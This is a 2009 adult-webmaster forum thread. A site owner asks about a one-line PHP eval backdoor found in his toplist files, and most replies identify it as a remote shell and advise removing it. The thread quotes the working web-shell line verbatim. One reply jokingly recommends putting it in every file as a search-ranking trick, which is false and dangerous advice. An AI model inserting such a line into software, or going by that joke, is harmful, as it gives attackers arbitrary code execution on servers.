|
|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
 |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
02-25-2009, 11:01 AM
|
#1 |
|
Confirmed User
Industry Role:
Join Date: Nov 2003
Posts: 8,053
|
<? eval($_POST[x]); ?> is this a hack?
i found this in my toplist files
<? eval($_POST[x]); ?> what is that? a hack?
__________________
Programs that owe me money ---- Epassporte.com ~ $2700 | Protraffic.com ~ $2600 | XonDemand.com ~ $3000 Email: [email protected] |
|
|
|
02-25-2009, 11:07 AM
|
#3 |
|
(felis madjewicus)
Industry Role:
Join Date: Jul 2006
Location: In Mom & Dad's Basement
Posts: 20,368
|
hax teh planet
|
|
|
|
|
02-25-2009, 11:10 AM
|
#4 |
|
Confirmed User
Industry Role:
Join Date: Jul 2007
Location: Intraweb
Posts: 274
|
Most likely, it executes whatever code is in the post variable 'x' as php, so if someone posted some malicious php code it could be pretty bad depending on how your server is configured.
I don't really see any real point in having that in there and would most likely remove it unless you know it's used for something and even then i'd find a way to replace that functionality w/o something that didn't leave such a big security hole. |
|
|
|
|
02-25-2009, 11:33 AM
|
#5 |
|
Confirmed User
Join Date: Apr 2004
Location: Toronto, ON
Posts: 1,706
|
That code CANNOT be used for anything good, period.
If your toplist stops working after removing that line, find another piece of software to replace it, no programmer with half a clue would include that code.
__________________
 315-310
|
|
|
|
|
02-25-2009, 11:41 AM
|
#6 |
|
Too lazy to set a custom title
Industry Role:
Join Date: Sep 2005
Location: Springfield
Posts: 13,826
|
yes it is...
it can run any command attacker wants...
__________________
Make a bank with Chaturbate - the best selling webcam program    Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!! PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email: 
|
|
|
|
|
02-25-2009, 12:17 PM
|
#7 |
|
there's no $$$ in porn
Industry Role:
Join Date: Jul 2005
Location: icq: 195./568.-230 (btw: not getting offline msgs)
Posts: 33,063
|
It's evil.
|
|
|
|
|
02-25-2009, 12:21 PM
|
#8 |
|
Too lazy to set a koala
Industry Role:
Join Date: Jan 2007
Location: CZ/EU forever!
Posts: 16,139
|
"insert shell here"
__________________
|
|
|
|
|
02-25-2009, 01:14 PM
|
#9 |
|
Damn Right I Kiss Ass!
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,422
|
That is indeed "a hack"... Remote shell... Allows anyone to execute code as the user apache is running as. Usually "nobody".
What can it be used for? select * from users; among other things... |
|
|
|
|
02-25-2009, 01:40 PM
|
#10 |
|
Guest
Posts: n/a
|
heh, remove it, asap.
|
|
|
|
02-25-2009, 01:58 PM
|
#11 |
|
►SouthOfHeaven
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
|
thats the secret google priority code, you should place it on the top of every file for better search engine ranking
__________________
hatisblack at yahoo.com |
|
|
|
![<? eval($_POST[x]); ?> is this a hack?](iconimages/fucking-around-and-business-discussion/eval-_post-hack.gif)
BUY MY SIG - 50$/Year
